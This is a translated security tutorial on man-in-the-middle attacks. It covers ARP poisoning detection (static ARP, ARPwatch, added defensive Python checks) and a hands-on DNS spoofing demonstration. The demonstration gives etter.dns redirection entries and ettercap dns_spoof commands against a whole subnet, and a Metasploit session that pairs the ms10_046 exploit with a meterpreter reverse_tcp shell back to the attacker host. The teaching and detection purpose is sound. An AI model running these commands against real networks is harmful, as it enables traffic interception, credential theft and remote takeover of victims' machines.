Man-in-the-middle attack: DNS Spoofing

Source: Internet
Author: User
Tags: mac vendor, dns spoofing

In the previous article (Man-in-the-middle attack: ARP poisoning), we discussed these dangerous attacks and the practical principles of ARP poisoning. In this article, I will first discuss how to detect and prevent ARP poisoning (or ARP spoofing) attacks, and then review another man-in-the-middle attack: DNS spoofing.
ARP cache poisoning attacks are very dangerous, so it is important to raise security awareness among users and to analyze effective tools and policies. On a small network, maintaining the ARP table is easy; on a large network it is difficult and troublesome. At the end of the previous article, we listed tools and techniques that can be used to detect ARP cache poisoning attacks. Let's review each of them:
Static ARP
You can manually add entries to the network ARP table. Once an entry is inserted this way, you have a static ARP mapping. Entering the data is also very simple: in your terminal/CMD, you only need to use "arp -s".
Example:
Your current ARP table:
root@bt:~# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:22:93:cf:eb:6d   C                     eth0
Let's assume I want to add a new host to my ARP cache table. I enter the following command:
arp -s IP MAC
root@bt:~# arp -s 192.168.1.2 00:50:FC:A8:36:F5
root@bt:~# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.2              ether   00:50:fc:a8:36:f5   CM                    eth0
192.168.1.1              ether   00:22:93:cf:eb:6d   C                     eth0
root@bt:~#
Note that manually added ARP entries (flag M in the table above marks a permanent entry) only apply to the current session: when you restart the computer, the table is rebuilt. If you want to use this method, create a batch/bash file containing the entries and add it to the startup items.
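As an added example (not code from the original article), here is a small Python helper that compares the live `arp` table with a list of pinned IP-to-MAC pairs and tells you which entries are already permanent, which still need `arp -s`, and which disagree with the pin list. The `arp` output layout is the one shown above; the pin-file format and all sample values are constructed for this example.

```python
import re

# Constructed `arp` output, laid out like the table in the article.
SAMPLE_ARP_OUTPUT = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.2              ether   00:50:fc:a8:36:f5   CM                    eth0
192.168.1.1              ether   00:22:93:cf:eb:6d   C                     eth0
192.168.1.5              ether   00:27:0e:21:a6:1e   C                     eth0
"""
# Constructed pin file (hypothetical "IP MAC" format); the last MAC disagrees.
SAMPLE_PINS = """\
192.168.1.1 00:22:93:cf:eb:6d
192.168.1.2 00:50:FC:A8:36:F5
192.168.1.5 00:27:0e:21:a6:1f
"""
MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")

def parse_arp_table(text):
    """Return {ip: (mac, flags)} from `arp` output; the header row is skipped."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4:  # Address HWtype HWaddress Flags ...
            table[fields[0]] = (fields[2].lower(), fields[3])
    return table

def parse_pins(text):
    """Return {ip: mac} from the pin file, rejecting malformed MACs."""
    pins = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            ip, mac = line.split()
            if not MAC_RE.match(mac.lower()):
                raise ValueError(f"bad MAC for {ip}: {mac}")
            pins[ip] = mac.lower()
    return pins

def audit(table, pins):
    """Per pinned IP: ok (permanent), pin (dynamic, correct), mismatch, absent."""
    report = {}
    for ip, mac in pins.items():
        live = table.get(ip)
        if live is None:
            report[ip] = "absent"
        elif live[0] != mac:
            report[ip] = "mismatch"   # live MAC differs: possible poisoning
        else:
            report[ip] = "ok" if "M" in live[1] else "pin"
    return report

def pin_commands(report, pins):
    """The `arp -s` lines still needed; nothing is executed here."""
    return [f"arp -s {ip} {pins[ip]}" for ip, state in report.items() if state == "pin"]
```

The generated lines are what you would place in the startup script mentioned above, after checking every "mismatch" by hand.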
ARPwatch
(listens for and records ARP activity)
This is a good utility for monitoring ARP traffic on a network. It detects and logs changes in IP-to-MAC pairings and can also send emails describing each change. Installation is also very simple.
For Ubuntu users:
# apt-get install arpwatch
root@bt:~# arpwatch -h
Version 2.1a15
Usage: arpwatch [-dN] [-f datafile] [-i interface] [-n net[/width]] [-r file] [-s sendmail_path] [-p] [-a] [-m addr] [-u username] [-R seconds] [-Q] [-z ignorenet/ignoremask]
To start monitoring quickly, run the following command:
# arpwatch -i interface
root@bt:~# arpwatch -i eth0
Check whether the program is running:
root@bt:~# ps -ef | grep arpwatch
arpwatch  1041     1  0 ?        00:00:00 /usr/sbin/arpwatch -u arpwatch -N -p
root      2191  2165  0 pts/0    00:00:00 grep --color=auto arpwatch
The next step is to read ARPwatch's log, which is also very simple: change to its data directory and read the file.
root@bt:~# cd /var/lib/arpwatch
root@bt:/var/lib/arpwatch# ls
arp.dat  arp.dat-
root@bt:/var/lib/arpwatch# cat arp.dat
00:50:fc:a8:36:f5	192.168.1.2	1337437776	eth0
00:27:0e:21:a6:1e	192.168.1.5	1337437923	eth0
Therefore, if you are a network administrator, you should implement policies such as these to monitor ARP tables and protect hosts from ARP poisoning attacks.
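The following Python script is an added example, not part of the article or of ARPwatch itself: it replays an arp.dat file in the format shown above (the sample lines are constructed, re-using addresses from this article) and reports the two conditions a defender cares about, an IP whose MAC changed and a MAC that answers for several IPs.

```python
from collections import defaultdict

# Constructed arp.dat content in the format shown above (mac ip time iface).
# The third line re-uses 192.168.1.2 with a different MAC, which is what an
# ARP-poisoned entry for that host looks like in arpwatch's database.
SAMPLE_ARP_DAT = """\
00:50:fc:a8:36:f5\t192.168.1.2\t1337437776\teth0
00:27:0e:21:a6:1e\t192.168.1.5\t1337437923\teth0
00:1c:23:42:8d:04\t192.168.1.2\t1337438100\teth0
00:1c:23:42:8d:04\t192.168.1.12\t1337438101\teth0
"""

def parse_arp_dat(text):
    """Return (mac, ip, timestamp, iface) tuples sorted oldest first."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        iface = parts[3] if len(parts) > 3 else "?"
        records.append((parts[0].lower(), parts[1], int(parts[2]), iface))
    return sorted(records, key=lambda r: r[2])

def find_changed_addresses(records):
    """{ip: [mac, ...]} for IPs seen with more than one MAC, in the order the
    MACs appeared; this is arpwatch's "changed ethernet address" condition."""
    seen = defaultdict(list)
    for mac, ip, _ts, _iface in records:
        if mac not in seen[ip]:
            seen[ip].append(mac)
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}

def find_shared_macs(records):
    """{mac: [ip, ...]} for MACs that answered for several IPs. A single
    host claiming another machine's address is a poisoning tell-tale; a
    router legitimately owning several IPs is the benign case to rule out."""
    owners = defaultdict(set)
    for mac, ip, _ts, _iface in records:
        owners[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in owners.items() if len(ips) > 1}
```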
Of course, man-in-the-middle attacks are not limited to ARP spoofing. As mentioned above, many other techniques can be used to carry out a man-in-the-middle attack; a major example is DNS spoofing, which we will analyze next.
DNS Spoofing Attacks
DNS spoofing is a very dangerous man-in-the-middle attack that attackers can use to steal users' confidential information. Although this article offers some new insights, it is important to understand that DNS spoofing is a general concept: there are several ways to implement a DNS spoofing attack.
In a DNS spoofing attack, the attacker forges DNS traffic on the network. To understand DNS spoofing, you must therefore first understand how DNS works.
DNS (Domain Name System) is a very important Internet protocol. It belongs to the TCP/IP suite and is a hierarchical, distributed database holding information about domain names; it maps domain names to their respective IP addresses on the network. DNS locates hosts/servers by looking up their friendly names. The devices between your computer and the server (routers, servers, etc.) do not understand friendly names such as infosecinstitute.com; they only know IP addresses, and DNS is responsible for the translation.
Let's look at the figure below to understand normal communication between a host and its local DNS server.
[Figure: normal DNS query and response between a host and the local DNS server]
The DNS server holds a database that maps domain names to their IP addresses. In normal communication, the host sends a query to the server and the server responds with the correct record. If the DNS server does not hold the answer for an incoming request, it forwards the request to an external DNS server to obtain the correct response.
So how can an attacker use a man-in-the-middle position to carry out DNS spoofing? Here is the answer:
The attacker uses DNS spoofing within a man-in-the-middle attack to intercept the session and redirect it to a fake website. If you want to access google.com, whose IP address is 173.194.35.37, the attacker can use DNS spoofing to intercept the session and redirect you to a fake website, and the fake website's IP address can be any address the attacker chooses.
Demonstrate DNS Spoofing Attacks
In the previous articles in this series, I found that ettercap is a good tool for demonstrating ARP spoofing attacks. Ettercap also includes a DNS plug-in, which is very easy to use.
Open the ettercap GUI, click "Sniff" and then "Unified sniffing", and select your network interface. Then open the Hosts menu and scan the whole subnet for active hosts. While that runs, we edit the etter.dns file so that the correct DNS spoofing entries are in place:
# microsoft sucks
# redirect it to www.linux.org
#
freebuf.com        A   192.182.196.56
*.freebuf.com      A   192.182.196.56
www.2cto.com       PTR 192.182.196.56   # Wildcards in PTR are not allowed
By default, ettercap redirects the domain to the IP address of another website. Let's change it:
freebuf.com        A   192.168.1.12
*.freebuf.com      A   192.168.1.12
www.2cto.com       PTR 192.168.1.12   # Wildcards in PTR are not allowed
192.168.1.12 is the attacker's IP address. Make sure a web server is running on the attacker's machine and that IP forwarding is enabled. On the victim's computer:
C:\> ping www.2cto.com
Pinging microsoft.com [65.55.58.201] with 32 bytes of data:
Reply from 65.55.58.20: bytes=32 time=167ms TTL=54
Reply from 65.55.58.20: bytes=32 time=167ms TTL=54
Reply from 65.55.58.20: bytes=32 time=167ms TTL=54
Ping statistics for 65.55.58.20
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
In the ettercap GUI, select the victim host as Target 1 and the default router (gateway) as Target 2.
Click Mitm - ARP poisoning, tick "Sniff remote connections", and then click Start - Start sniffing.
Click Plugins - Manage the plugins and select dns_spoof. This activates the dns_spoof plug-in, which performs the DNS spoofing man-in-the-middle attack. On the victim's computer, the result of the DNS spoofing attack is:
As you can see, once DNS has been successfully spoofed, all sessions go to the attacker's host rather than the real Microsoft server.
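As an added defender-side example (not from the article or from ettercap), the Python below applies two checks to DNS answers observed on the LAN: a public name resolving to a private address, which is exactly what the etter.dns entries above produce, and disagreement with a trusted resolver reached over a path the local attacker does not control. The observed answers, the trusted reference set and the internal-name suffixes are all constructed assumptions.

```python
import ipaddress

# Constructed observations: (queried name, IP returned by the LAN resolver).
# 192.168.1.12 is the attacker address used in the article's etter.dns.
OBSERVED = [
    ("www.2cto.com", "192.168.1.12"),
    ("google.com", "173.194.35.37"),
    ("intranet.example.local", "192.168.1.10"),
    ("www.example.com", "93.184.216.34"),
]

# Constructed reference answers from a trusted resolver queried out of band
# (e.g. over a VPN); assumed values, not real records.
TRUSTED = {
    "www.2cto.com": {"65.55.58.201"},
    "google.com": {"173.194.35.37"},
    "www.example.com": {"93.184.215.14"},
}

# Names under these suffixes are expected to resolve to LAN addresses.
INTERNAL_SUFFIXES = (".local", ".lan", ".internal")


def is_internal_name(name):
    """True for names that legitimately live on the private network."""
    return name.lower().endswith(INTERNAL_SUFFIXES)


def classify(name, ip, trusted=TRUSTED):
    """Return 'ok', 'private-answer' or 'mismatch' for one observed answer."""
    addr = ipaddress.ip_address(ip)
    # Check 1: a public name answered with an RFC 1918/loopback/link-local
    # address is the signature of a LAN-side redirection.
    if addr.is_private and not is_internal_name(name):
        return "private-answer"
    # Check 2: compare with the trusted resolver when we have its answer.
    expected = trusted.get(name)
    if expected is not None and ip not in expected:
        return "mismatch"
    return "ok"


def spoofed_answers(observed, trusted=TRUSTED):
    """Return [(name, ip, reason)] for every answer that failed a check."""
    flagged = []
    for name, ip in observed:
        verdict = classify(name, ip, trusted)
        if verdict != "ok":
            flagged.append((name, ip, verdict))
    return flagged
```

A "mismatch" can also be a legitimate CDN difference between vantage points, so compare against several trusted answers before treating it as an alert.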
This demo used the ettercap GUI. You can also use the command-line version; let's look at a quick command-line demonstration of DNS spoofing.
First, locate etter.dns with a simple command:
root@bt:~# locate etter.dns
/usr/local/share/videojak/etter.dns
/usr/share/ettercap/etter.dns
root@bt:~#
Now edit the file with your favorite text editor, for example gedit or nano:
root@bt:~# gedit /usr/share/ettercap/etter.dns
root@bt:~# nano /usr/share/ettercap/etter.dns
After saving the file, start the DNS spoofing attack through ettercap:
root@bt:~# ettercap -T -q -P dns_spoof -M arp // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:1C:23:42:8D:04 192.168.1.12 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
Let's break down the command structure to analyze the options used for the DNS spoofing attack:
-P: use a plug-in; here we use dns_spoof.
-T: use the text-based interface.
-q: quiet mode (do not print packet contents).
-M arp: start the ARP spoofing attack.
// //: empty target specifications, meaning the whole subnet.
These options can also be combined. For example, if you want to spoof a specific victim host, you can specify the victim's IP address as the target when performing the DNS spoofing attack.
root@bt:~# ettercap -T -q -P dns_spoof -M arp // //
In another example, you can bind the attack to a specific interface. To do this, run the following command:
root@bt:~# ettercap -T -q -i eth0 -P dns_spoof -M arp // //
DNS spoofing is a very dangerous attack, because attackers can carry it out with tools such as ettercap's dns_spoof plug-in, and they can combine it with the Social Engineering Toolkit (SET) to take control of the victim's computer. Imagine how easy this is: with SET and DNS spoofing, the attacker configures SET with their IP address, clones a site such as Google, and spoofs the domain name to their IP address. When the victim opens Google, the attack sends them to the attacker's IP address instead, and a remote session is established.
Let's consider an example scenario: the Metasploit framework used together with ettercap's DNS spoofing. Select the exploit you want and, for the payload, select reverse_tcp:
root@bt:~# msfconsole
       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.12
SRVHOST => 192.168.1.12
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.12:4444
[*]
[*] Send vulnerable clients to \\www.2cto.com\bqokoWwx\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*]
[*] Using URL: http://192.168.1.12:80/
[*] Server started.
If everything is working, all that remains is to configure the etter.dns file accordingly (see the figure below): I set the attacker's IP address as the answer for the target website. Once the victim opens the website, they are redirected to 192.168.1.12 and the session starts.
[Figure: etter.dns entries pointing the target website at 192.168.1.12, and the resulting session]
This is one of the most dangerous aspects of DNS spoofing: the victim does not notice anything, because everything looks legitimate, yet the data is not going where it should. The attack is also dangerous because attackers may use this technique to compromise other computers on public Wi-Fi hotspots. I hope this article has presented useful policies for detecting ARP spoofing and DNS spoofing attacks.
====================
I have read a lot of hacking articles from abroad and found that they are very well written. I should study them well here in China.

Translated by Heee from a foreign website. Source: FreeBuf.com
